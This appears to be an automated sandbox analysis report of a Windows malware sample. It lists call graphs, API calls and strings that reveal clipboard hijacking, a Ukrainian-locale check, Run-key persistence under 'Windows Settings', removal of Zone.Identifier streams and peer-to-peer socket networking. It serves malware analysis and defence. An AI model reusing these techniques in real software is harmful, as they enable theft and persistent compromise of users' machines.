5362->5363 5364 401b70 5362->5364 5363->5359 5364->5363 5365 409d90 7 API calls 5364->5365 5366 401b9d 5365->5366 5366->5363 5367 40a220 8 API calls 5366->5367 5368 401bc9 5367->5368 5369 401be6 5368->5369 5370 401bd6 5368->5370 5382 401ae0 WSASend 5369->5382 5371 40a1b0 __aligned_recalloc_base 3 API calls 5370->5371 5373 401bdc 5371->5373 5373->5359 5374 401bf3 5375 401c33 5374->5375 5376 401bfc EnterCriticalSection 5374->5376 5379 40a1b0 __aligned_recalloc_base 3 API calls 5375->5379 5377 401c13 5376->5377 5378 401c1f LeaveCriticalSection 5376->5378 5377->5378 5378->5359 5380 401c3c 5379->5380 5381 40a1b0 __aligned_recalloc_base 3 API calls 5380->5381 5381->5363 5383 401b50 5382->5383 5384 401b12 WSAGetLastError 5382->5384 5383->5374 5384->5383 5385 401b1f 5384->5385 5386 401b56 5385->5386 5387 401b26 Sleep WSASend 5385->5387 5386->5374 5387->5383 5387->5384 5388 40d4d0 5391 40b570 5388->5391 5401 40b581 5391->5401 5393 40b59f 5395 40a1b0 __aligned_recalloc_base 3 API calls 5393->5395 5396 40b94f 5395->5396 5397 40b960 21 API calls 5397->5401 5400 40b520 13 API calls 5400->5401 5401->5393 5401->5397 5401->5400 5402 40ae80 32 API calls 5401->5402 5405 40bab0 5401->5405 5412 40b250 EnterCriticalSection 5401->5412 5417 406e90 5401->5417 5422 406f30 5401->5422 5427 406d60 5401->5427 5434 406e60 5401->5434 5402->5401 5406 40bac1 lstrlenA 5405->5406 5407 40c190 7 API calls 5406->5407 5411 40badf 5407->5411 5408 40baeb 5409 40bb6f 5408->5409 5410 40a1b0 __aligned_recalloc_base 3 API calls 5408->5410 5409->5401 5410->5409 5411->5406 5411->5408 5413 40b268 5412->5413 5414 40b2a4 LeaveCriticalSection 5413->5414 5437 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5413->5437 5414->5401 5416 40b293 5416->5414 5438 406ed0 5417->5438 5420 406ec9 5420->5401 5421 40d160 17 API calls 5421->5420 5423 406ed0 75 API calls 5422->5423 5424 406f4f 5423->5424 5425 406f7c 5424->5425 5453 406f90 5424->5453 5425->5401 5464 405fa0 EnterCriticalSection 5427->5464 5429 406d7a 5433 406dad 5429->5433 5469 406dc0 5429->5469 5432 40a1b0 __aligned_recalloc_base 3 API calls 5432->5433 5433->5401 5476 406060 EnterCriticalSection 5434->5476 5436 406e82 5436->5401 5437->5416 5439 406ee3 5438->5439 5441 406ea4 5439->5441 5442 405eb0 EnterCriticalSection 5439->5442 5441->5420 5441->5421 5443 40c820 71 API calls 5442->5443 5444 405ece 5443->5444 5445 405f8b LeaveCriticalSection 5444->5445 5446 405ee7 5444->5446 5449 405f08 5444->5449 5445->5439 5447 405ef1 memcpy 5446->5447 5452 405f06 5446->5452 5447->5452 5448 40a1b0 __aligned_recalloc_base 3 API calls 5450 405f88 5448->5450 5451 405f66 memcpy 5449->5451 5449->5452 5450->5445 5451->5452 5452->5448 5456 40b480 5453->5456 5457 40bf00 3 API calls 5456->5457 5458 40b48b 5457->5458 5459 40b4a7 lstrlenA 5458->5459 5460 40c190 7 API calls 5459->5460 5461 40b4dd 5460->5461 5462 40a1b0 __aligned_recalloc_base 3 API calls 5461->5462 5463 406fd5 5461->5463 5462->5463 5463->5425 5465 405fbe 5464->5465 5466 40604a LeaveCriticalSection 5465->5466 5467 40a220 8 API calls 5465->5467 5466->5429 5468 40601c 5467->5468 5468->5466 5470 409fa0 __aligned_recalloc_base 7 API calls 5469->5470 5471 406dd2 memcpy 5470->5471 5472 40b480 13 API calls 5471->5472 5473 406e3c 5472->5473 5474 40a1b0 __aligned_recalloc_base 3 API calls 5473->5474 5475 406da1 5474->5475 5475->5432 5501 40c880 5476->5501 5479 4062a3 LeaveCriticalSection 5479->5436 5480 40c820 71 API calls 5482 406099 5480->5482 5481 4061b8 5484 4061e1 5481->5484 5487 405cf0 74 API calls 5481->5487 5482->5479 5482->5481 5483 4060f4 memcpy 5482->5483 5485 40a1b0 __aligned_recalloc_base 3 API calls 5483->5485 5486 40a1b0 __aligned_recalloc_base 3 API calls 5484->5486 5488 406118 5485->5488 5489 406202 5486->5489 5487->5484 5490 40a220 8 API calls 5488->5490 5489->5479 5491 406211 CreateFileW 5489->5491 5492 406128 5490->5492 5491->5479 5493 406234 5491->5493 5494 40a1b0 __aligned_recalloc_base 3 API calls 5492->5494 5496 406251 WriteFile 5493->5496 5497 40628f FlushFileBuffers CloseHandle 5493->5497 5495 40614f 5494->5495 5498 40c190 7 API calls 5495->5498 5496->5493 5497->5479 5499 406185 5498->5499 5500 407310 70 API calls 5499->5500 5500->5481 5504 40bdd0 5501->5504 5509 40bde1 5504->5509 5505 40a220 8 API calls 5505->5509 5506 40bdfb 5508 40a1b0 __aligned_recalloc_base 3 API calls 5506->5508 5507 40bd30 70 API calls 5507->5509 5510 406082 5508->5510 5509->5505 5509->5506 5509->5507 5511 407af0 68 API calls 5509->5511 5512 40be3b memcmp 5509->5512 5510->5479 5510->5480 5511->5509 5512->5506 5512->5509 5513 40cf50 5514 40cfbe 5513->5514 5515 40cf66 5513->5515 5515->5514 5516 40cf70 5515->5516 5517 40cfc3 5515->5517 5518 40d013 5515->5518 5521 409d90 7 API calls 5516->5521 5519 40cfe8 5517->5519 5520 40cfdb InterlockedDecrement 5517->5520 5547 40bbc0 5518->5547 5523 40a1b0 __aligned_recalloc_base 3 API calls 5519->5523 5520->5519 5524 40cf7d 5521->5524 5525 40cff4 5523->5525 5536 4023d0 5524->5536 5527 40a1b0 __aligned_recalloc_base 3 API calls 5525->5527 5527->5514 5531 40cfab InterlockedIncrement 5531->5514 5533 40d071 IsBadReadPtr 5535 40d039 5533->5535 5534 40b570 193 API calls 5534->5535 5535->5514 5535->5533 5535->5534 5552 40bcc0 5535->5552 5537 402413 5536->5537 5538 4023d9 5536->5538 5540 40ad40 5537->5540 5538->5537 5539 4023ea InterlockedIncrement 5538->5539 5539->5537 5541 40add0 2 API calls 5540->5541 5542 40ad4f 5541->5542 5543 40ad59 5542->5543 5544 40ad5d EnterCriticalSection 5542->5544 5543->5514 5543->5531 5545 40ad7c LeaveCriticalSection 5544->5545 5545->5543 5548 40bbd3 5547->5548 5549 40bbfd memcpy 5547->5549 5550 409fe0 9 API calls 5548->5550 5549->5535 5551 40bbf4 5550->5551 5551->5549 5553 40bce9 5552->5553 5554 40bcde 5552->5554 5553->5554 5555 40bd01 memmove 5553->5555 5554->5535 5555->5554 5556 401f50 GetQueuedCompletionStatus 5557 401f92 5556->5557 5558 402008 5556->5558 5559 401f97 WSAGetOverlappedResult 5557->5559 5563 401d60 5557->5563 5559->5557 5560 401fb9 WSAGetLastError 5559->5560 5560->5557 5562 401fd3 GetQueuedCompletionStatus 5562->5557 5562->5558 5564 401ef2 InterlockedDecrement setsockopt closesocket 5563->5564 5565 401d74 5563->5565 5567 401e39 5564->5567 5565->5564 5566 401d7c 5565->5566 5583 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5566->5583 5567->5562 5569 401d81 InterlockedExchange 5570 401d98 5569->5570 5571 401e4e 5569->5571 5570->5567 5576 401da9 InterlockedDecrement 5570->5576 5577 401dbc InterlockedDecrement InterlockedExchangeAdd 5570->5577 5572 401e67 5571->5572 5573 401e57 InterlockedDecrement 5571->5573 5574 401e72 5572->5574 5575 401e87 InterlockedDecrement 5572->5575 5573->5562 5578 401ae0 4 API calls 5574->5578 5579 401ee9 5575->5579 5576->5562 5580 401e2f 5577->5580 5581 401e7e 5578->5581 5579->5562 5584 401cf0 5580->5584 5581->5562 5583->5569 5585 401d00 InterlockedExchangeAdd 5584->5585 5586 401cfc 5584->5586 5587 401d53 5585->5587 5588 401d17 InterlockedIncrement 5585->5588 5586->5567 5587->5567 5592 401c50 WSARecv 5588->5592 5590 401d46 5590->5587 5591 401d4c InterlockedDecrement 5590->5591 5591->5587 5593 401cd2 5592->5593 5594 401c8e 5592->5594 5593->5590 5595 401c90 WSAGetLastError 5594->5595 5596 401ca4 Sleep WSARecv 5594->5596 5597 401cdb 5594->5597 5595->5593 5595->5594 5596->5593 5596->5595 5597->5590 5598 40d550 5608 4013b0 5598->5608 5600 40d5dd 5602 40d577 InterlockedExchangeAdd 5603 40d5bb WaitForSingleObject 5602->5603 5604 40d55d 5602->5604 5603->5604 5605 40d5d4 5603->5605 5604->5600 5604->5602 5604->5603 5620 40b200 EnterCriticalSection 5604->5620 5625 40b520 5604->5625 5628 401330 5605->5628 5609 409d90 7 API calls 5608->5609 5610 4013bb CreateEventA socket 5609->5610 5611 4013f2 5610->5611 5617 4013f8 5610->5617 5614 401330 8 API calls 5611->5614 5612 401401 bind 5615 401444 CreateThread 5612->5615 5616 401434 5612->5616 5613 401462 5613->5604 5614->5617 5615->5613 5638 401100 5615->5638 5618 401330 8 API calls 5616->5618 5617->5612 5617->5613 5619 40143a 5618->5619 5619->5604 5621 40b237 LeaveCriticalSection 5620->5621 5622 40b21f 5620->5622 5621->5604 5623 40bec0 3 API calls 5622->5623 5624 40b22a 5623->5624 5624->5621 5626 40b480 13 API calls 5625->5626 5627 40b561 5626->5627 5627->5604 5629 401339 5628->5629 5637 40139b 5628->5637 5630 401341 SetEvent WaitForSingleObject CloseHandle 5629->5630 5629->5637 5631 40138b 5630->5631 5632 401369 5630->5632 5667 40ab40 shutdown closesocket 5631->5667 5632->5631 5634 40a1b0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5632->5634 5634->5632 5635 401395 5636 40a1b0 __aligned_recalloc_base 3 API calls 5635->5636 5636->5637 5637->5600 5639 401115 ioctlsocket 5638->5639 5640 4011e4 5639->5640 5646 40113a 5639->5646 5641 40a1b0 __aligned_recalloc_base 3 API calls 5640->5641 5643 4011ea 5641->5643 5642 4011cd WaitForSingleObject 5642->5639 5642->5640 5644 409fe0 9 API calls 5644->5646 5645 401168 recvfrom 5645->5642 5645->5646 5646->5642 5646->5644 5646->5645 5647 4011ad InterlockedExchangeAdd 5646->5647 5649 401000 5647->5649 5650 401014 5649->5650 5651 40103b 5650->5651 5653 409d90 7 API calls 5650->5653 5660 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5651->5660 5653->5651 5654 40105b 5661 401580 5654->5661 5656 4010ec 5656->5646 5657 4010a3 IsBadReadPtr 5659 401071 5657->5659 5658 4010d8 memmove 5658->5659 5659->5656 5659->5657 5659->5658 5660->5654 5662 401592 5661->5662 5663 4015a5 memcpy 5661->5663 5664 409fe0 9 API calls 5662->5664 5665 4015c1 5663->5665 5666 40159f 5664->5666 5665->5659 5666->5663 5667->5635 5892 40ca90 5893 40ad40 4 API calls 5892->5893 5894 40caa3 5893->5894 5895 40caba 5894->5895 5897 40cad0 InterlockedExchangeAdd 5894->5897 5898 40caed 5897->5898 5908 40cae6 5897->5908 5914 40cdc0 5898->5914 5901 40cb0d InterlockedIncrement 5911 40cb17 5901->5911 5902 40b520 13 API calls 5902->5911 5903 40cb40 5921 40aa20 inet_ntoa 5903->5921 5905 40cb4c 5906 40cc10 InterlockedDecrement 5905->5906 5922 40ab40 shutdown closesocket 5906->5922 5908->5895 5909 409fa0 __aligned_recalloc_base 7 API calls 5909->5911 5910 40ccf0 6 API calls 5910->5911 5911->5902 5911->5903 5911->5906 5911->5909 5911->5910 5912 40b570 193 API calls 5911->5912 5913 40a1b0 __aligned_recalloc_base 3 API calls 5911->5913 5912->5911 5913->5911 5915 40cdcd socket 5914->5915 5916 40cde2 htons connect 5915->5916 5917 40ce3f 5915->5917 5916->5917 5918 40ce2a 5916->5918 5917->5915 5919 40cafd 5917->5919 5923 40ab40 shutdown closesocket 5918->5923 5919->5901 5919->5908 5921->5905 5922->5908 5923->5919 5924 406c16 5928 406bf8 5924->5928 5925 406d38 Sleep 5925->5928 5926 406c29 5927 4062c0 4 API calls 5926->5927 5929 406c3a 5927->5929 5928->5925 5928->5926 5930 406d48 ExitThread 5928->5930 5932 4063a0 4 API calls 5928->5932 5931 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5929->5931 5933 406c5b 5929->5933 5934 406cd6 wsprintfW 5931->5934 5935 406ceb wsprintfW 5931->5935 5932->5928 5934->5935 5936 4066b0 52 API calls 5935->5936 5936->5933 5937 40b420 5938 40b423 WaitForSingleObject 5937->5938 5939 40b451 5938->5939 5940 40b43b InterlockedDecrement 5938->5940 5941 40b44a 5940->5941 5941->5938 5942 40ab60 16 API calls 5941->5942 5942->5941 5943 401920 GetTickCount WaitForSingleObject 5944 401ac9 5943->5944 5945 40194d WSAWaitForMultipleEvents 5943->5945 5946 4019f0 GetTickCount 5945->5946 5947 40196a WSAEnumNetworkEvents 5945->5947 5948 401a43 GetTickCount 5946->5948 5949 401a05 EnterCriticalSection 5946->5949 5947->5946 5958 401983 5947->5958 5950 401ab5 WaitForSingleObject 5948->5950 5951 401a4e EnterCriticalSection 5948->5951 5952 401a16 5949->5952 5953 401a3a LeaveCriticalSection 5949->5953 5950->5944 5950->5945 5955 401aa1 LeaveCriticalSection GetTickCount 5951->5955 5956 401a5f InterlockedExchangeAdd 5951->5956 5960 401a29 LeaveCriticalSection 5952->5960 5985 401820 5952->5985 5953->5950 5954 401992 accept 5954->5946 5954->5958 5955->5950 6003 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5956->6003 5958->5946 5958->5954 5964 401cf0 7 API calls 5958->5964 5965 4022c0 5958->5965 5960->5950 5962 401a72 5962->5955 5962->5956 6004 40ab40 shutdown closesocket 5962->6004 5964->5946 5966 4022d2 EnterCriticalSection 5965->5966 5967 4022cd 5965->5967 5968 4022e7 5966->5968 5969 4022fd LeaveCriticalSection 5966->5969 5967->5958 5968->5969 5970 402308 5969->5970 5971 40230f 5969->5971 5970->5958 5972 409d90 7 API calls 5971->5972 5973 402319 5972->5973 5974 402326 getpeername CreateIoCompletionPort 5973->5974 5975 4023b8 5973->5975 5976 4023b2 5974->5976 5977 402366 5974->5977 6007 40ab40 shutdown closesocket 5975->6007 5981 40a1b0 __aligned_recalloc_base 3 API calls 5976->5981 6005 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5977->6005 5979 4023c3 5979->5958 5981->5975 5982 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6006 4021e0 EnterCriticalSection LeaveCriticalSection 5982->6006 5984 4023ab 5984->5958 5986 401830 5985->5986 5995 40190f 5985->5995 5987 40183d InterlockedExchangeAdd 5986->5987 5986->5995 5988 401854 5987->5988 5987->5995 5989 401880 5988->5989 5988->5995 6008 4017a0 EnterCriticalSection 5988->6008 5993 401891 5989->5993 6017 40ab40 shutdown closesocket 5989->6017 5992 4018a7 InterlockedDecrement 5994 401901 5992->5994 5993->5992 5993->5994 5996 402247 5994->5996 5997 402265 EnterCriticalSection 5994->5997 5995->5953 5996->5953 5998 40229c LeaveCriticalSection DeleteCriticalSection 5997->5998 6001 40227d 5997->6001 5999 40a1b0 __aligned_recalloc_base 3 API calls 5998->5999 5999->5996 6000 40a1b0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 6000->6001 6001->6000 6002 40229b 6001->6002 6002->5998 6003->5962 6004->5962 6005->5982 6006->5984 6007->5979 6009 401807 LeaveCriticalSection 6008->6009 6010 4017ba InterlockedExchangeAdd 6008->6010 6009->5988 6011 4017ca LeaveCriticalSection 6010->6011 6012 4017d9 6010->6012 6011->5988 6013 40a1b0 __aligned_recalloc_base 3 API calls 6012->6013 6014 4017fe 6013->6014 6015 40a1b0 __aligned_recalloc_base 3 API calls 6014->6015 6016 401804 6015->6016 6016->6009 6017->5993 6018 40d520 6021 401200 6018->6021 6020 40d542 6022 401314 6021->6022 6023 40121d 6021->6023 6022->6020 6023->6022 6024 409fa0 __aligned_recalloc_base 7 API calls 6023->6024 6025 401247 memcpy htons 6024->6025 6026 4012ed 6025->6026 6027 401297 sendto 6025->6027 6028 40a1b0 __aligned_recalloc_base 3 API calls 6026->6028 6029 4012b6 InterlockedExchangeAdd 6027->6029 6030 4012e9 6027->6030 6031 4012fc 6028->6031 6029->6027 6032 4012cc 6029->6032 6030->6026 6033 40130a 6030->6033 6031->6020 6035 40a1b0 __aligned_recalloc_base 3 API calls 6032->6035 6034 40a1b0 __aligned_recalloc_base 3 API calls 6033->6034 6034->6022 6036 4012db 6035->6036 6036->6020 6037 40e121 6039 40e12a 6037->6039 6038 40e21d 6039->6038 6040 40e193 lstrcmpiW 6039->6040 6041 40e213 SysFreeString 6040->6041 6042 40e1a6 6040->6042 6041->6038 6043 40df10 2 API calls 6042->6043 6044 40e1b4 6043->6044 6044->6041 6045 40e205 6044->6045 6046 40e1e3 lstrcmpiW 6044->6046 6045->6041 6047 40e1f5 6046->6047 6048 40e1fb SysFreeString 6046->6048 6047->6048 6048->6045 5682 405970 GetWindowLongW 5683 405994 5682->5683 5684 4059b6 5682->5684 5685 4059a1 5683->5685 5686 405a27 IsClipboardFormatAvailable 5683->5686 5687 4059b1 5684->5687 5691 405a06 5684->5691 5692 4059ee SetWindowLongW 5684->5692 5688 4059c4 SetClipboardViewer SetWindowLongW 5685->5688 5689 4059a7 5685->5689 5693 405a43 IsClipboardFormatAvailable 5686->5693 5694 405a3a 5686->5694 5690 405ba4 DefWindowProcA 5687->5690 5688->5690 5689->5687 5695 405b5d RegisterRawInputDevices ChangeClipboardChain 5689->5695 5691->5687 5696 405a0c SendMessageA 5691->5696 5692->5687 5693->5694 5697 405a58 IsClipboardFormatAvailable 5693->5697 5698 405a75 OpenClipboard 5694->5698 5716 405b3c 5694->5716 5695->5690 5696->5687 5697->5694 5699 405a85 GetClipboardData 5698->5699 5698->5716 5699->5687 5701 405a9d GlobalLock 5699->5701 5700 405b45 SendMessageA 5700->5687 5701->5687 5702 405ab5 5701->5702 5703 405ac8 5702->5703 5704 405ae9 5702->5704 5706 405afe 5703->5706 5707 405ace 5703->5707 5705 405690 13 API calls 5704->5705 5708 405ad4 GlobalUnlock CloseClipboard 5705->5708 5723 4057b0 5706->5723 5707->5708 5717 405570 5707->5717 5712 405b27 5708->5712 5708->5716 5731 404970 lstrlenW 5712->5731 5715 40a1b0 __aligned_recalloc_base 3 API calls 5715->5716 5716->5687 5716->5700 5718 40557b 5717->5718 5719 405581 lstrlenW 5718->5719 5720 405594 5718->5720 5721 409fa0 __aligned_recalloc_base 7 API calls 5718->5721 5722 4055b1 lstrcpynW 5718->5722 5719->5718 5719->5720 5720->5708 5721->5718 5722->5718 5722->5720 5728 4057bd 5723->5728 5724 4057c3 lstrlenA 5724->5728 5729 4057d6 5724->5729 5725 405630 2 API calls 5725->5728 5726 409fa0 __aligned_recalloc_base 7 API calls 5726->5728 5728->5724 5728->5725 5728->5726 5728->5729 5730 40a1b0 __aligned_recalloc_base 3 API calls 5728->5730 5765 405760 5728->5765 5729->5708 5730->5728 5734 4049a4 5731->5734 5732 404bee 5732->5715 5733 404dbb StrStrW 5736 404dd2 StrStrW 5733->5736 5737 404dce 5733->5737 5734->5732 5735 404c00 5734->5735 5742 404d30 StrStrW 5734->5742 5735->5732 5735->5733 5738 404de5 5736->5738 5739 404de9 StrStrW 5736->5739 5737->5736 5738->5739 5740 404dfc 5739->5740 5747 404e12 5740->5747 5770 4048a0 lstrlenW 5740->5770 5742->5735 5743 404d58 StrStrW 5742->5743 5743->5735 5744 404d80 StrStrW 5743->5744 5744->5735 5745 40539b StrStrW 5746 4053b7 StrStrW 5745->5746 5750 4053ae StrStrW 5745->5750 5748 4053d3 StrStrW 5746->5748 5746->5750 5747->5732 5747->5745 5747->5750 5748->5750 5751 405470 StrStrW 5750->5751 5752 405469 5750->5752 5753 405483 5751->5753 5754 40548a StrStrW 5751->5754 5752->5751 5753->5754 5755 4054a4 StrStrW 5754->5755 5756 40549d 5754->5756 5757 4054b7 5755->5757 5758 4054be StrStrW 5755->5758 5756->5755 5757->5758 5759 4054d1 5758->5759 5760 4054d8 lstrlenA 5758->5760 5759->5760 5760->5732 5761 4054eb GlobalAlloc 5760->5761 5761->5732 5762 405506 GlobalLock 5761->5762 5762->5732 5763 405519 memcpy GlobalUnlock OpenClipboard 5762->5763 5763->5732 5764 405546 EmptyClipboard SetClipboardData CloseClipboard 5763->5764 5764->5732 5766 40576b 5765->5766 5767 405771 lstrlenA 5766->5767 5768 405630 2 API calls 5766->5768 5769 4057a4 5766->5769 5767->5766 5768->5766 5769->5728 5773 4048c4 5770->5773 5771 40490d 5771->5747 5772 404911 iswalpha 5772->5773 5774 40492c iswdigit 5772->5774 5773->5771 5773->5772 5773->5774 5774->5773 5775 40d5f0 5781 401470 5775->5781 5777 40d604 5778 40d62f 5777->5778 5779 40d615 WaitForSingleObject 5777->5779 5780 401330 8 API calls 5779->5780 5780->5778 5782 401483 5781->5782 5783 401572 5781->5783 5782->5783 5784 409d90 7 API calls 5782->5784 5783->5777 5785 401498 CreateEventA socket 5784->5785 5786 4014d5 5785->5786 5787 4014cf 5785->5787 5786->5783 5789 4014e2 htons setsockopt bind 5786->5789 5788 401330 8 API calls 5787->5788 5788->5786 5790 401546 5789->5790 5791 401558 CreateThread 5789->5791 5792 401330 8 API calls 5790->5792 5791->5783 5794 401100 20 API calls __aligned_recalloc_base 5791->5794 5793 40154c 5792->5793 5793->5777 6049 40cc30 6054 40cc90 6049->6054 6052 40cc5e 6053 40cc90 send 6053->6052 6055 40cca1 send 6054->6055 6056 40cc43 6055->6056 6057 40ccbe 6055->6057 6056->6052 6056->6053 6057->6055 6057->6056 6058 40ceb0 6063 40ceb4 6058->6063 6059 40b200 5 API calls 6059->6063 6060 40ced0 WaitForSingleObject 6062 40cef5 6060->6062 6060->6063 6061 40cad0 207 API calls 6061->6063 6063->6059 6063->6060 6063->6061 6063->6062 5795 40ee74 5796 40ee7c 5795->5796 5797 40ef30 5796->5797 5801 40f0b1 5796->5801 5800 40eeb5 5800->5797 5805 40ef9c RtlUnwind 5800->5805 5802 40f0e2 5801->5802 5804 40f0c6 5801->5804 5802->5800 5803 40f151 NtQueryVirtualMemory 5803->5802 5804->5802 5804->5803 5806 40efb4 5805->5806 5806->5800 6064 406a39 6066 4069df 6064->6066 6065 406a0f lstrcmpiW 6065->6066 6066->6065 6067 406b8a FindNextFileW 6066->6067 6070 406a76 PathMatchSpecW 6066->6070 6071 406af4 PathFileExistsW 6066->6071 6077 406570 11 API calls 6066->6077 6068 4069b3 lstrcmpW 6067->6068 6069 406ba6 FindClose 6067->6069 6068->6066 6072 4069c9 lstrcmpW 6068->6072 6074 406bb3 6069->6074 6070->6066 6073 406a97 wsprintfW SetFileAttributesW DeleteFileW 6070->6073 6071->6066 6075 406b0a wsprintfW wsprintfW 6071->6075 6072->6066 6073->6066 6075->6066 6076 406b74 MoveFileExW 6075->6076 6076->6067 6077->6066 5807 40757a ExitThread 5808 40ee7c 5809 40ee9a 5808->5809 5812 40ef30 5808->5812 5810 40f0b1 NtQueryVirtualMemory 5809->5810 5811 40eeb5 5810->5811 5811->5812 5813 40ef9c RtlUnwind 5811->5813 5813->5811 5814 405f7d 5816 405f11 5814->5816 5815 40a1b0 __aligned_recalloc_base 3 API calls 5817 405f88 LeaveCriticalSection 5815->5817 5818 405f66 memcpy 5816->5818 5819 405f7b 5816->5819 5818->5819 5819->5815

                                                                                                                    Executed Functions

                                                                                                                    Function 0040E730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 65 40e730-40e75c GetLocaleInfoA strcmp 66 40e762 65->66 67 40e75e-40e760 65->67 68 40e764-40e767 66->68 67->68
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                                                                    • strcmp.NTDLL ref: 0040E752
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocalestrcmp
                                                                                                                    • String ID: UKR
                                                                                                                    • API String ID: 3191669094-64918367
                                                                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B
                                                                                                                    Function 00407590 Relevance: 114.1, APIs: 50, Strings: 15, Instructions: 351sleepfilesynchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00000BB8), ref: 0040759E
                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
                                                                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
                                                                                                                    • PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
                                                                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 0040763A
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                                                                    • wcscmp.NTDLL ref: 00407663
                                                                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                                                                    • API String ID: 4172876685-2783337622
                                                                                                                    • Opcode ID: be37c590e1d8e90253e276ab3f8f4dbbb477af03a6aa52447b81e277da3d58b1
                                                                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                                                                    • Opcode Fuzzy Hash: be37c590e1d8e90253e276ab3f8f4dbbb477af03a6aa52447b81e277da3d58b1
                                                                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D
                                                                                                                    Function 0040E980 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60sleepprocessCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 59 40e980-40e9e0 memset * 2 CreateProcessW 60 40e9f1-40ea15 ShellExecuteW 59->60 61 40e9e2-40e9ef Sleep 59->61 63 40ea26 60->63 64 40ea17-40ea24 Sleep 60->64 62 40ea28-40ea2b 61->62 63->62 64->62
                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 0040E98E
                                                                                                                    • memset.NTDLL ref: 0040E99E
                                                                                                                    • CreateProcessW.KERNELBASE(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                                                                    • Sleep.KERNELBASE(000003E8), ref: 0040E9E7
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
